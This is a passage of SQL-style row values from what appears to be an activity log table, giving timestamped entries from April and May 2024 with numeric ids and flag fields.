(10744, '2024-04-27 19:35:20', 1, 2060, 0, 1, 1),
(10745, '2024-04-27 21:03:30', 1, 2054, 0, 1, 1),
(10746, '2024-04-27 22:47:31', 1, 2054, 0, 1, 1),
(10747, '2024-04-28 04:57:35', 1, 2061, 0, 1, 1),
(10748, '2024-04-28 06:27:25', 1, 2054, 0, 1, 1),
(10749, '2024-04-28 07:55:55', 1, 2060, 0, 1, 1),
(10750, '2024-04-28 13:09:34', 1, 2061, 0, 1, 1),
(10751, '2024-04-28 17:09:51', 1, 2054, 0, 1, 1),
(10752, '2024-04-28 18:42:05', 1, 2062, 0, 1, 1),
(10753, '2024-04-28 23:02:56', 1, 2064, 0, 1, 1),
(10754, '2024-04-29 02:03:09', 1, 2058, 0, 1, 1),
(10755, '2024-04-29 03:42:07', 1, 2063, 0, 1, 1),
(10756, '2024-04-29 03:42:18', 1, 2061, 0, 1, 1),
(10757, '2024-04-29 03:42:27', 1, 2055, 0, 1, 1),
(10758, '2024-04-29 03:42:34', 1, 2064, 0, 1, 1),
(10759, '2024-04-29 03:42:41', 1, 2060, 0, 1, 1),
(10760, '2024-04-29 03:42:51', 1, 2059, 0, 1, 1),
(10761, '2024-04-29 03:43:07', 1, 2058, 0, 1, 1),
(10762, '2024-04-29 03:46:10', 1, 2062, 0, 1, 1),
(10763, '2024-04-29 03:46:19', 1, 2054, 0, 1, 1),
(10764, '2024-04-29 03:54:05', 1, 2061, 0, 1, 1),
(10765, '2024-04-29 03:54:31', 1, 2054, 0, 1, 1),
(10766, '2024-04-29 03:54:47', 1, 2059, 0, 1, 1),
(10767, '2024-04-29 03:55:01', 1, 2058, 0, 1, 1),
(10768, '2024-04-29 03:55:14', 1, 2053, 0, 1, 1),
(10769, '2024-04-29 03:55:23', 1, 2063, 0, 1, 1),
(10770, '2024-04-29 03:55:34', 1, 2062, 0, 1, 1),
(10771, '2024-04-29 03:55:45', 1, 2055, 0, 1, 1),
(10772, '2024-04-29 03:56:04', 1, 2060, 0, 1, 1),
(10773, '2024-04-29 03:56:15', 1, 2064, 0, 1, 1),
(10774, '2024-04-29 04:37:35', 1, 2053, 0, 1, 1),
(10775, '2024-04-29 04:56:12', 1, 2059, 0, 1, 1),
(10776, '2024-04-29 04:59:03', 1, 2058, 0, 1, 1),
(10777, '2024-04-29 04:59:26', 1, 2064, 0, 1, 1),
(10778, '2024-04-29 05:48:10', 1, 2054, 0, 1, 1),
(10779, '2024-04-29 10:41:55', 1, 2064, 0, 1, 1),
(10780, '2024-04-29 14:21:18', 1, 2064, 0, 1, 1),
(10781, '2024-04-29 19:56:26', 1, 2061, 0, 1, 1),
(10782, '2024-04-29 20:27:48', 1, 2061, 0, 1, 1),
(10783, '2024-04-29 23:11:07', 1, 2061, 0, 1, 1),
(10784, '2024-04-30 04:52:36', 1, 2054, 0, 1, 1),
(10785, '2024-04-30 13:23:47', 1, 2060, 0, 1, 1),
(10786, '2024-04-30 18:13:53', 1, 2058, 0, 1, 1),
(10787, '2024-04-30 18:20:21', 1, 2061, 0, 1, 1),
(10788, '2024-05-01 01:44:05', 1, 2064, 0, 1, 1),
(10789, '2024-05-01 01:44:09', 1, 2064, 0, 1, 1),
(10790, '2024-05-01 01:44:18', 1, 2054, 0, 1, 1),
(10791, '2024-05-01 01:44:26', 1, 2064, 0, 1, 1),
(10792, '2024-05-01 01:44:36', 1, 2060, 0, 1, 1),
(10793, '2024-05-01 01:44:39', 1, 2060, 0, 1, 1),
(10794, '2024-05-01 01:45:00', 1, 2059, 0, 1, 1),
(10795, '2024-05-01 01:45:27', 1, 2054, 0, 1, 1),
(10796, '2024-05-01 01:45:50', 1, 2053, 0, 1, 1),
(10797, '2024-05-01 03:54:16', 1, 2061, 0, 1, 1),
(10798, '2024-05-01 05:17:26', 1, 2060, 0, 1, 1),
(10799, '2024-05-01 05:27:28', 1, 2063, 0, 1, 1),
(10800, '2024-05-01 05:47:54', 1, 2058, 0, 1, 1),
(10801, '2024-05-01 05:58:53', 1, 2061, 0, 1, 1),
(10802, '2024-05-01 06:30:22', 1, 2055, 0, 1, 1),
(10803, '2024-05-01 07:54:53', 1, 2061, 0, 1, 1),
(10804, '2024-05-01 08:44:12', 1, 2062, 0, 1, 1),
(10805, '2024-05-01 09:32:20', 1, 2063, 0, 1, 1),
(10806, '2024-05-01 09:32:23', 1, 2062, 0, 1, 1),
(10807, '2024-05-01 09:32:34', 1, 2063, 0, 1, 1),
(10808, '2024-05-01 09:57:02', 1, 2054, 0, 1, 1),
(10809, '2024-05-01 10:34:13', 1, 2060, 0, 1, 1),
(10810, '2024-05-01 10:43:49', 1, 2063, 0, 1, 1),
(10811, '2024-05-01 11:04:30', 1, 2058, 0, 1, 1),
(10812, '2024-05-01 11:07:36', 1, 2064, 0, 1, 1),
(10813, '2024-05-01 11:08:45', 1, 2062, 0, 1, 1),
(10814, '2024-05-01 11:09:12', 1, 2053, 0, 1, 1),
(10815, '2024-05-01 11:10:48', 1, 2063, 0, 1, 1),
(10816, '2024-05-01 11:10:56', 1, 2061, 0, 1, 1),
(10817, '2024-05-01 11:11:09', 1, 2059, 0, 1, 1),
(10818, '2024-05-01 11:11:12', 1, 2058, 0, 1, 1),
(10819, '2024-05-01 11:12:36', 1, 2055, 0, 1, 1),
(10820, '2024-05-01 11:12:44', 1, 2054, 0, 1, 1),
(10821, '2024-05-01 11:16:24', 1, 2060, 0, 1, 1),
(10822, '2024-05-01 11:46:25', 1, 2055, 0, 1, 1),
(10823, '2024-05-01 13:01:43', 1, 2061, 0, 1, 1),
(10824, '2024-05-01 13:45:59', 1, 2062, 0, 1, 1),
(10825, '2024-05-01 14:32:45', 1, 2061, 0, 1, 1),
(10826, '2024-05-01 14:59:47', 1, 2054, 0, 1, 1),
(10827, '2024-05-01 15:14:40', 1, 2059, 0, 1, 1),
(10828, '2024-05-01 15:27:27', 1, 2064, 0, 1, 1),
(10829, '2024-05-01 16:19:26', 1, 2060, 0, 1, 1),
(10830, '2024-05-01 21:47:34', 1, 2064, 0, 1, 1),
(10831, '2024-05-02 00:36:48', 1, 2060, 0, 1, 1),
(10832, '2024-05-02 00:46:46', 1, 2063, 0, 1, 1),
(10833, '2024-05-02 01:07:17', 1, 2058, 0, 1, 1),
(10834, '2024-05-02 01:47:06', 1, 2055, 0, 1, 1),
(10835, '2024-05-02 03:06:41', 1, 2061, 0, 1, 1),
(10836, '2024-05-02 03:55:51', 1, 2062, 0, 1, 1),
(10837, '2024-05-02 05:14:56', 1, 2054, 0, 1, 1),
(10838, '2024-05-02 05:31:43', 1, 2059, 0, 1, 1),
(10839, '2024-05-02 05:46:15', 1, 2064, 0, 1, 1),
(10840, '2024-05-02 06:23:26', 1, 2063, 0, 1, 1),
(10841, '2024-05-02 16:04:54', 1, 2060, 0, 1, 1),
(10842, '2024-05-02 16:09:19', 1, 2063, 0, 1, 1),
(10843, '2024-05-02 18:26:00', 1, 2055, 0, 1, 1),
(10844, '2024-05-03 02:52:41', 1, 2054, 0, 1, 1),
(10845, '2024-05-03 09:28:51', 1, 2059, 0, 1, 1),
(10846, '2024-05-03 18:45:37', 1, 2064, 0, 1, 1),
(10847, '2024-05-03 23:54:59', 1, 2059, 0, 1, 1),
(10848, '2024-05-04 04:53:32', 1, 2054, 0, 1, 1),
(10849, '2024-05-04 04:53:32', 1, 2062, 0, 1, 1),
(10850, '2024-05-04 04:53:32', 1, 2058, 0, 1, 1),
(10851, '2024-05-04 04:53:33', 1, 2063, 0, 1, 1),
(10852, '2024-05-04 04:53:33', 1, 2064, 0, 1, 1),
(10853, '2024-05-04 04:53:33', 1, 2059, 0, 1, 1),
(10854, '2024-05-04 04:53:33', 1, 2061, 0, 1, 1),
(10855, '2024-05-04 04:53:34', 1, 2060, 0, 1, 1),
(10856, '2024-05-04 04:53:35', 1, 2055, 0, 1, 1),
(10857, '2024-05-04 04:53:41', 4, 2060, 2303, 1, 1),
(10858, '2024-05-04 14:53:52', 1, 2062, 0, 1, 1),
(10859, '2024-05-04 14:54:14', 1, 2062, 0, 1, 1),
(10860, '2024-05-05 00:34:56', 1, 2058, 0, 1, 1),
(10861, '2024-05-05 04:48:30', 1, 2063, 0, 1, 1),
(10862, '2024-05-05 10:39:40', 1, 2059, 0, 1, 1),
(10863, '2024-05-05 11:12:50', 1, 2061, 0, 1, 1),
(10864, '2024-05-05 13:58:46', 1, 2059, 0, 1, 1),
(10865, '2024-05-05 15:02:22', 1, 2059, 0, 1, 1),
(10866, '2024-05-05 15:03:08', 1, 2059, 0, 1, 1),
(10867, '2024-05-05 15:03:11', 1, 2059, 0, 1, 1),
(10868, '2024-05-05 16:33:34', 1, 2061, 0, 1, 1),
(10869, '2024-05-05 17:04:41', 1, 2061, 0, 1, 1),
(10870, '2024-05-05 21:38:07', 1, 2062, 0, 1, 1),
(10871, '2024-05-05 22:17:07', 1, 2061, 0, 1, 1),
(10872, '2024-05-06 12:08:04', 1, 2053, 0, 1, 1),
(10873, '2024-05-06 12:08:14', 1, 2054, 0, 1, 1),
(10874, '2024-05-06 12:08:24', 1, 2055, 0, 1, 1),
(10875, '2024-05-06 12:10:00', 1, 2064, 0, 1, 1),
(10876, '2024-05-06 12:10:28', 1, 2063, 0, 1, 1),
(10877, '2024-05-06 12:10:54', 1, 2062, 0, 1, 1),
(10878, '2024-05-06 12:11:21', 1, 2060, 0, 1, 1),
(10879, '2024-05-06 12:11:47', 1, 2059, 0, 1, 1),
(10880, '2024-05-06 12:12:11', 1, 2061, 0, 1, 1),
(10881, '2024-05-06 12:12:35', 1, 2058, 0, 1, 1),
(10882, '2024-05-06 12:16:45', 1, 2054, 0, 1, 1),
(10883, '2024-05-06 13:27:00', 1, 2058, 0, 1, 1),
(10884, '2024-05-06 13:27:14', 1, 2061, 0, 1, 1),
(10885, '2024-05-06 13:27:23', 1, 2059, 0, 1, 1),
(10886, '2024-05-06 13:27:33', 1, 2060, 0, 1, 1),
(10887, '2024-05-06 13:27:41', 1, 2062, 0, 1, 1),
(10888, '2024-05-06 13:27:49', 1, 2063, 0, 1, 1),
(10889, '2024-05-06 13:27:58', 1, 2064, 0, 1, 1),
(10890, '2024-05-06 13:29:25', 1, 2055, 0, 1, 1),
(10891, '2024-05-06 13:29:35', 1, 2054, 0, 1, 1),
(10892, '2024-05-06 13:29:46', 1, 2053, 0, 1, 1),
(10893, '2024-05-07 02:09:10', 1, 2059, 0, 1, 1),
(10894, '2024-05-07 02:09:14', 1, 2059, 0, 1, 1),
(10895, '2024-05-07 03:26:17', 1, 2064, 0, 1, 1),
(10896, '2024-05-07 07:51:18', 1, 2054, 0, 1, 1),
(10897, '2024-05-07 13:21:14', 1, 2064, 0, 1, 1),
(10898, '2024-05-08 03:01:19', 1, 2064, 0, 1, 1),
(10899, '2024-05-08 03:48:50', 1, 2063, 0, 1, 1),
(10900, '2024-05-08 04:29:32', 1, 2054, 0, 1, 1),
(10901, '2024-05-08 04:55:36', 1, 2063, 0, 1, 1),
(10902, '2024-05-08 09:00:04', 1, 2062, 0, 1, 1),
(10903, '2024-05-08 15:19:10', 1, 2064, 0, 1, 1),
(10904, '2024-05-08 23:55:29', 1, 2064, 0, 1, 1),
(10905, '2024-05-09 03:49:02', 1, 2061, 0, 1, 1),
(10906, '2024-05-09 05:06:12', 1, 2060, 0, 1, 1),
(10907, '2024-05-09 09:16:18', 1, 2055, 0, 1, 1),
(10908, '2024-05-09 22:13:27', 1, 2060, 0, 1, 1),
(10909, '2024-05-09 22:34:53', 1, 2060, 0, 1, 1),
(10910, '2024-05-10 01:40:43', 1, 2058, 0, 1, 1),
(10911, '2024-05-10 02:50:17', 1, 2063, 0, 1, 1),
(10912, '2024-05-10 02:50:21', 1, 2063, 0, 1, 1),
(10913, '2024-05-10 05:36:21', 1, 2059, 0, 1, 1),
(10914, '2024-05-10 12:03:51', 1, 2063, 0, 1, 1),
(10915, '2024-05-10 12:09:58', 1, 2060, 0, 1, 1),
(10916, '2024-05-10 13:09:24', 1, 2060, 0, 1, 1),
(10917, '2024-05-10 14:45:10', 1, 2063, 0, 1, 1),
(10918, '2024-05-10 15:08:35', 1, 2059, 0, 1, 1),
(10919, '2024-05-10 16:46:19', 1, 2058, 0, 1, 1),
(10920, '2024-05-10 19:05:56', 1, 2060, 0, 1, 1),
(10921, '2024-05-10 22:59:57', 1, 2060, 0, 1, 1),
(10922, '2024-05-11 01:18:35', 1, 2064, 0, 1, 1),
(10923, '2024-05-11 03:23:09', 1, 2064, 0, 1, 1),
(10924, '2024-05-11 03:34:40', 1, 2061, 0, 1, 1),
(10925, '2024-05-11 03:34:42', 1, 2061, 0, 1, 1),
(10926, '2024-05-11 04:52:15', 1, 2061, 0, 1, 1),
(10927, '2024-05-11 11:07:49', 1, 2064, 0, 1, 1),
(10928, '2024-05-11 11:56:24', 1, 2061, 0, 1, 1),
(10929, '2024-05-11 13:10:37', 1, 2061, 0, 1, 1),
(10930, '2024-05-11 13:39:04', 1, 2060, 0, 1, 1),
(10931, '2024-05-11 13:47:51', 1, 2063, 0, 1, 1),
(10932, '2024-05-11 14:04:09', 1, 2058, 0, 1, 1),
(10933, '2024-05-11 14:10:47', 1, 2058, 0, 1, 1),
(10934, '2024-05-11 15:06:30', 1, 2055, 0, 1, 1),
(10935, '2024-05-11 16:50:15', 1, 2061, 0, 1, 1),
(10936, '2024-05-11 17:45:55', 1, 2062, 0, 1, 1),
(10937, '2024-05-11 19:03:07', 1, 2054, 0, 1, 1),
(10938, '2024-05-11 19:18:00', 1, 2059, 0, 1, 1),
(10939, '2024-05-11 19:30:27', 1, 2064, 0, 1, 1),
(10940, '2024-05-11 23:03:05', 1, 2060, 0, 1, 1),
(10941, '2024-05-11 23:11:53', 1, 2063, 0, 1, 1),
(10942, '2024-05-11 23:34:52', 1, 2058, 0, 1, 1),
(10943, '2024-05-12 00:29:10', 1, 2055, 0, 1, 1),
(10944, '2024-05-12 02:09:56', 1, 2061, 0, 1, 1),
(10945, '2024-05-12 03:06:11', 1, 2062, 0, 1, 1),
(10946, '2024-05-12 04:21:35', 1, 2054, 0, 1, 1),
(10947, '2024-05-12 04:36:31', 1, 2059, 0, 1, 1),
(10948, '2024-05-12 04:49:03', 1, 2064, 0, 1, 1),
(10949, '2024-05-12 07:22:57', 1, 2055, 0, 1, 1),
(10950, '2024-05-12 20:06:29', 1, 2062, 0, 1, 1),
(10951, '2024-05-12 21:41:27', 1, 2060, 0, 1, 1),
(10952, '2024-05-13 00:27:57', 1, 2054, 0, 1, 1),
(10953, '2024-05-13 04:45:55', 1, 2054, 0, 1, 1),
(10954, '2024-05-13 05:50:28', 1, 2062, 0, 1, 1),
(10955, '2024-05-13 08:52:03', 1, 2054, 0, 1, 1),
(10956, '2024-05-13 15:11:11', 1, 2059, 0, 1, 1),
(10957, '2024-05-13 15:11:13', 1, 2059, 0, 1, 1),
(10958, '2024-05-13 15:56:48', 1, 2058, 0, 1, 1),
(10959, '2024-05-13 16:40:31', 1, 2058, 0, 1, 1),
(10960, '2024-05-13 18:38:29', 1, 2061, 0, 1, 1),
(10961, '2024-05-13 19:28:54', 1, 2064, 0, 1, 1),
(10962, '2024-05-13 19:30:16', 1, 2062, 0, 1, 1),
(10963, '2024-05-13 19:30:49', 1, 2053, 0, 1, 1),
(10964, '2024-05-13 19:32:16', 1, 2063, 0, 1, 1),
(10965, '2024-05-13 19:32:28', 1, 2061, 0, 1, 1),
(10966, '2024-05-13 19:32:40', 1, 2059, 0, 1, 1),
(10967, '2024-05-13 19:32:48', 1, 2058, 0, 1, 1),
(10968, '2024-05-13 19:34:08', 1, 2055, 0, 1, 1),
(10969, '2024-05-13 19:34:16', 1, 2054, 0, 1, 1),
(10970, '2024-05-13 19:37:58', 1, 2060, 0, 1, 1),
(10971, '2024-05-13 20:54:38', 1, 2060, 0, 1, 1),
(10972, '2024-05-13 20:54:41', 1, 2063, 0, 1, 1),
(10973, '2024-05-13 20:54:43', 1, 2058, 0, 1, 1),
(10974, '2024-05-13 20:54:47', 1, 2055, 0, 1, 1),
(10975, '2024-05-13 20:54:55', 1, 2061, 0, 1, 1),
(10976, '2024-05-13 20:54:58', 1, 2062, 0, 1, 1),
(10977, '2024-05-13 20:58:32', 1, 2054, 0, 1, 1),
(10978, '2024-05-13 20:59:29', 1, 2059, 0, 1, 1),
(10979, '2024-05-13 21:00:12', 1, 2064, 0, 1, 1),
(10980, '2024-05-13 21:52:54', 1, 2060, 0, 1, 1),
(10981, '2024-05-13 21:54:43', 1, 2061, 0, 1, 1),
(10982, '2024-05-13 21:57:51', 1, 2059, 0, 1, 1),
(10983, '2024-05-13 22:00:16', 1, 2064, 0, 1, 1),
(10984, '2024-05-13 22:02:24', 1, 2062, 0, 1, 1),
(10985, '2024-05-13 22:05:47', 1, 2055, 0, 1, 1),
(10986, '2024-05-13 22:08:40', 1, 2063, 0, 1, 1),
(10987, '2024-05-13 22:09:32', 1, 2058, 0, 1, 1),
(10988, '2024-05-14 05:11:44', 1, 2061, 0, 1, 1),
(10989, '2024-05-14 13:22:22', 1, 2058, 0, 1, 1),
(10990, '2024-05-14 14:30:04', 1, 2063, 0, 1, 1),
(10991, '2024-05-14 17:22:20', 1, 2064, 0, 1, 1),
(10992, '2024-05-14 18:50:18', 1, 2064, 0, 1, 1),
(10993, '2024-05-14 19:41:57', 1, 2059, 0, 1, 1),
(10994, '2024-05-15 03:53:35', 1, 2055, 0, 1, 1),
(10995, '2024-05-15 05:25:39', 1, 2055, 0, 1, 1),
(10996, '2024-05-15 10:24:48', 1, 2059, 0, 1, 1),
(10997, '2024-05-15 10:49:14', 1, 2063, 0, 1, 1),
(10998, '2024-05-15 12:56:50', 1, 2054, 0, 1, 1),
(10999, '2024-05-15 16:26:23', 1, 2064, 0, 1, 1),
(11000, '2024-05-15 22:42:16', 1, 2063, 0, 1, 1),
(11001, '2024-05-16 02:33:29', 1, 2064, 0, 1, 1),
(11002, '2024-05-16 02:34:05', 1, 2054, 0, 1, 1),
(11003, '2024-05-16 04:24:05', 1, 2055, 0, 1, 1),
(11004, '2024-05-16 05:43:41', 1, 2054, 0, 1, 1),
(11005, '2024-05-16 06:38:13', 1, 2059, 0, 1, 1),
(11006, '2024-05-16 09:54:31', 1, 2062, 0, 1, 1),
(11007, '2024-05-16 11:20:06', 1, 2063, 0, 1, 1),
(11008, '2024-05-16 11:26:54', 1, 2058, 0, 1, 1),
(11009, '2024-05-16 11:32:56', 1, 2064, 0, 1, 1),
(11010, '2024-05-16 11:34:07', 1, 2064, 0, 1, 1),
(11011, '2024-05-16 12:30:37', 1, 2061, 0, 1, 1),
(11012, '2024-05-16 14:05:09', 1, 2055, 0, 1, 1),
(11013, '2024-05-16 15:33:46', 1, 2055, 0, 1, 1),
(11014, '2024-05-16 15:33:51', 1, 2063, 0, 1, 1),
(11015, '2024-05-16 15:34:05', 1, 2058, 0, 1, 1),
(11016, '2024-05-16 15:58:45', 1, 2058, 0, 1, 1),
(11017, '2024-05-16 16:14:44', 1, 2055, 0, 1, 1),
(11018, '2024-05-16 20:35:39', 1, 2062, 0, 1, 1),
(11019, '2024-05-16 20:36:06', 1, 2059, 0, 1, 1),
(11020, '2024-05-16 20:45:20', 1, 2062, 0, 1, 1),
(11021, '2024-05-16 22:10:20', 1, 2060, 0, 1, 1),
(11022, '2024-05-17 05:16:40', 1, 2059, 0, 1, 1),
(11023, '2024-05-17 05:17:33', 1, 2062, 0, 1, 1),
(11024, '2024-05-17 05:47:52', 1, 2059, 0, 1, 1),
(11025, '2024-05-17 07:29:30', 1, 2063, 0, 1, 1),
(11026, '2024-05-17 17:04:10', 1, 2064, 0, 1, 1),
(11027, '2024-05-17 17:54:01', 1, 2062, 0, 1, 1),
(11028, '2024-05-17 18:05:17', 1, 2061, 0, 1, 1),
(11029, '2024-05-17 21:56:04', 1, 2062, 0, 1, 1),
(11030, '2024-05-17 21:56:41', 1, 2062, 0, 1, 1),
(11031, '2024-05-17 22:10:57', 1, 2062, 0, 1, 1),
(11032, '2024-05-17 23:01:25', 1, 2054, 0, 1, 1),
(11033, '2024-05-18 02:27:27', 1, 2055, 0, 1, 1),
(11034, '2024-05-18 03:42:45', 1, 2061, 0, 1, 1),
(11035, '2024-05-18 03:48:10', 1, 2053, 0, 1, 1),
(11036, '2024-05-18 04:59:40', 1, 2061, 0, 1, 1),
(11037, '2024-05-18 06:37:42', 1, 2055, 0, 1, 1),
(11038, '2024-05-18 12:56:02', 1, 2062, 0, 1, 1),
(11039, '2024-05-18 15:59:29', 1, 2059, 0, 1, 1),
(11040, '2024-05-18 16:39:51', 1, 2059, 0, 1, 1),
(11041, '2024-05-18 19:33:10', 1, 2059, 0, 1, 1),
(11042, '2024-05-18 19:34:44', 1, 2062, 0, 1, 1),
(11043, '2024-05-18 19:35:09', 1, 2060, 0, 1, 1),
(11044, '2024-05-18 19:35:16', 1, 2061, 0, 1, 1),
(11045, '2024-05-18 19:35:32', 1, 2061, 0, 1, 1),
(11046, '2024-05-18 19:37:15', 1, 2060, 0, 1, 1),
(11047, '2024-05-18 20:25:55', 1, 2055, 0, 1, 1),
(11048, '2024-05-19 17:46:55', 1, 2060, 0, 1, 1),
(11049, '2024-05-19 17:47:00', 1, 2054, 0, 1, 1),
(11050, '2024-05-19 19:27:38', 1, 2060, 0, 1, 1),
(11051, '2024-05-19 23:51:55', 1, 2058, 0, 1, 1),
(11052, '2024-05-20 02:09:26', 1, 2055, 0, 1, 1),
(11053, '2024-05-20 02:10:01', 1, 2064, 0, 1, 1),
(11054, '2024-05-20 02:10:16', 1, 2063, 0, 1, 1),
(11055, '2024-05-20 02:10:29', 1, 2062, 0, 1, 1),
(11056, '2024-05-20 02:10:43', 1, 2060, 0, 1, 1),
(11057, '2024-05-20 11:45:57', 1, 2054, 0, 1, 1),
(11058, '2024-05-20 13:23:58', 1, 2053, 0, 1, 1),
(11059, '2024-05-20 13:52:30', 1, 2054, 0, 1, 1),
(11060, '2024-05-20 16:16:04', 1, 2063, 0, 1, 1),
(11061, '2024-05-20 16:16:28', 1, 2064, 0, 1, 1),
(11062, '2024-05-20 16:41:23', 1, 2059, 0, 1, 1),
(11063, '2024-05-20 18:20:44', 1, 2063, 0, 1, 1),
(11064, '2024-05-20 23:52:22', 1, 2054, 0, 1, 1),
(11065, '2024-05-21 00:22:36', 1, 2061, 0, 1, 1),
(11066, '2024-05-21 09:03:25', 1, 2061, 0, 1, 1),
(11067, '2024-05-21 09:03:25', 1, 2064, 0, 1, 1),
(11068, '2024-05-21 09:03:26', 1, 2058, 0, 1, 1),
(11069, '2024-05-21 09:03:26', 1, 2060, 0, 1, 1),
(11070, '2024-05-21 09:03:26', 1, 2055, 0, 1, 1),
(11071, '2024-05-21 09:03:26', 1, 2063, 0, 1, 1),
(11072, '2024-05-21 09:03:26', 1, 2054, 0, 1, 1),
(11073, '2024-05-21 09:03:26', 1, 2062, 0, 1, 1),
(11074, '2024-05-21 09:03:26', 1, 2059, 0, 1, 1),
(11075, '2024-05-21 09:03:34', 4, 2060, 2346, 1, 1),
(11076, '2024-05-21 09:42:03', 1, 2054, 0, 1, 1),
(11077, '2024-05-21 15:28:51', 1, 2061, 0, 1, 1),
(11078, '2024-05-21 17:40:03', 1, 2054, 0, 1, 1),
(11079, '2024-05-21 19:43:34', 1, 2053, 0, 1, 1),
(11080, '2024-05-22 05:45:48', 1, 2054, 0, 1, 1),
(11081, '2024-05-22 20:11:07', 1, 2054, 0, 1, 1),
(11082, '2024-05-22 23:10:23', 1, 2053, 0, 1, 1),
(11083, '2024-05-23 01:23:49', 1, 2063, 0, 1, 1),
(11084, '2024-05-23 04:20:18', 1, 2060, 0, 1, 1),
(11085, '2024-05-23 04:28:48', 1, 2063, 0, 1, 1),
(11086, '2024-05-23 04:51:08', 1, 2058, 0, 1, 1),
(11087, '2024-05-23 05:09:48', 1, 2064, 0, 1, 1),
(11088, '2024-05-23 05:36:55', 1, 2055, 0, 1, 1),
(11089, '2024-05-23 06:56:34', 1, 2061, 0, 1, 1),
(11090, '2024-05-23 07:38:27', 1, 2062, 0, 1, 1),
(11091, '2024-05-23 09:05:44', 1, 2054, 0, 1, 1),
(11092, '2024-05-23 09:25:08', 1, 2059, 0, 1, 1),
(11093, '2024-05-23 09:40:23', 1, 2054, 0, 1, 1),
(11094, '2024-05-23 09:42:17', 1, 2064, 0, 1, 1),
(11095, '2024-05-23 11:21:36', 1, 2060, 0, 1, 1),
(11096, '2024-05-23 17:39:07', 1, 2064, 0, 1, 1),
(11097, '2024-05-23 17:45:40', 1, 2054, 0, 1, 1),
(11098, '2024-05-23 19:09:28', 1, 2054, 0, 1, 1),
(11099, '2024-05-23 19:09:33', 1, 2060, 0, 1, 1),
(11100, '2024-05-23 23:50:23', 1, 2062, 0, 1, 1),
(11101, '2024-05-24 01:19:54', 1, 2054, 0, 1, 1),
(11102, '2024-05-24 01:19:58', 1, 2055, 0, 1, 1),
(11103, '2024-05-24 01:20:02', 1, 2064, 0, 1, 1),
(11104, '2024-05-24 01:20:04', 1, 2063, 0, 1, 1),
(11105, '2024-05-24 01:20:06', 1, 2062, 0, 1, 1),
(11106, '2024-05-24 01:20:07', 1, 2060, 0, 1, 1),
(11107, '2024-05-24 01:20:08', 1, 2059, 0, 1, 1),
(11108, '2024-05-24 01:20:10', 1, 2061, 0, 1, 1),
(11109, '2024-05-24 01:20:11', 1, 2058, 0, 1, 1),
(11110, '2024-05-24 07:59:32', 1, 2058, 0, 1, 1),
(11111, '2024-05-24 10:12:42', 1, 2064, 0, 1, 1),
(11112, '2024-05-24 14:30:51', 1, 2062, 0, 1, 1),
(11113, '2024-05-24 15:08:23', 1, 2062, 0, 1, 1),
(11114, '2024-05-24 17:00:43', 1, 2053, 0, 1, 1),
(11115, '2024-05-25 01:25:23', 1, 2061, 0, 1, 1),
(11116, '2024-05-25 01:25:36', 1, 2055, 0, 1, 1),
(11117, '2024-05-25 01:25:46', 1, 2059, 0, 1, 1),
(11118, '2024-05-25 01:26:15', 1, 2064, 0, 1, 1),
(11119, '2024-05-25 01:27:01', 1, 2058, 0, 1, 1),
(11120, '2024-05-25 01:27:10', 1, 2062, 0, 1, 1),
(11121, '2024-05-25 01:29:37', 1, 2063, 0, 1, 1),
(11122, '2024-05-25 01:30:27', 1, 2053, 0, 1, 1),
(11123, '2024-05-25 01:48:16', 1, 2058, 0, 1, 1),
(11124, '2024-05-25 01:52:45', 1, 2059, 0, 1, 1),
(11125, '2024-05-25 01:53:26', 1, 2063, 0, 1, 1),
(11126, '2024-05-25 01:57:24', 1, 2055, 0, 1, 1),
(11127, '2024-05-25 02:03:27', 1, 2054, 0, 1, 1),
(11128, '2024-05-25 02:05:32', 1, 2054, 0, 1, 1),
(11129, '2024-05-25 02:51:21', 1, 2062, 0, 1, 1),
(11130, '2024-05-25 03:31:50', 1, 2064, 0, 1, 1),
(11131, '2024-05-25 04:07:43', 1, 2060, 0, 1, 1),
(11132, '2024-05-25 13:28:56', 1, 2063, 0, 1, 1),
(11133, '2024-05-25 20:54:49', 1, 2061, 0, 1, 1),
(11134, '2024-05-26 01:19:32', 1, 2053, 0, 1, 1),
(11135, '2024-05-26 03:11:20', 1, 2064, 0, 1, 1),
(11136, '2024-05-26 03:23:04', 1, 2055, 0, 1, 1),
(11137, '2024-05-26 05:08:27', 1, 2058, 0, 1, 1),
(11138, '2024-05-26 13:52:26', 1, 2053, 0, 1, 1),
(11139, '2024-05-26 15:53:42', 1, 2053, 0, 1, 1),
(11140, '2024-05-26 19:35:06', 1, 2064, 0, 1, 1),
(11141, '2024-05-26 19:45:55', 1, 2058, 0, 1, 1),
(11142, '2024-05-27 00:30:34', 1, 2064, 0, 1, 1),
(11143, '2024-05-27 00:30:39', 1, 2064, 0, 1, 1),
(11144, '2024-05-27 00:30:42', 1, 2064, 0, 1, 1),
(11145, '2024-05-27 00:30:45', 1, 2063, 0, 1, 1),
(11146, '2024-05-27 00:30:48', 1, 2062, 0, 1, 1),
(11147, '2024-05-27 00:30:51', 1, 2061, 0, 1, 1),
(11148, '2024-05-27 00:30:54', 1, 2060, 0, 1, 1),
(11149, '2024-05-27 00:30:57', 1, 2059, 0, 1, 1),
(11150, '2024-05-27 04:34:03', 1, 2058, 0, 1, 1),
(11151, '2024-05-27 08:01:44', 1, 2059, 0, 1, 1),
(11152, '2024-05-27 19:01:16', 1, 2061, 0, 1, 1),
(11153, '2024-05-27 22:22:41', 1, 2058, 0, 1, 1),
(11154, '2024-05-28 05:47:34', 1, 2062, 0, 1, 1),
(11155, '2024-05-28 09:22:19', 1, 2058, 0, 1, 1),
(11156, '2024-05-28 09:22:34', 1, 2064, 0, 1, 1),
(11157, '2024-05-28 09:22:54', 1, 2062, 0, 1, 1),
(11158, '2024-05-28 09:22:58', 1, 2055, 0, 1, 1),
(11159, '2024-05-28 09:23:07', 1, 2054, 0, 1, 1),
(11160, '2024-05-28 09:23:17', 1, 2059, 0, 1, 1),
(11161, '2024-05-28 09:23:19', 1, 2063, 0, 1, 1),
(11162, '2024-05-28 09:23:22', 1, 2061, 0, 1, 1),
(11163, '2024-05-28 09:23:28', 1, 2060, 0, 1, 1),
(11164, '2024-05-28 09:24:09', 1, 2058, 0, 1, 1),
(11165, '2024-05-28 09:24:20', 1, 2064, 0, 1, 1),
(11166, '2024-05-28 09:24:50', 1, 2062, 0, 1, 1),
(11167, '2024-05-28 09:24:52', 1, 2055, 0, 1, 1),
(11168, '2024-05-28 09:24:58', 1, 2059, 0, 1, 1),
(11169, '2024-05-28 09:25:00', 1, 2063, 0, 1, 1),
(11170, '2024-05-28 09:25:03', 1, 2054, 0, 1, 1),
(11171, '2024-05-28 09:25:05', 1, 2061, 0, 1, 1),
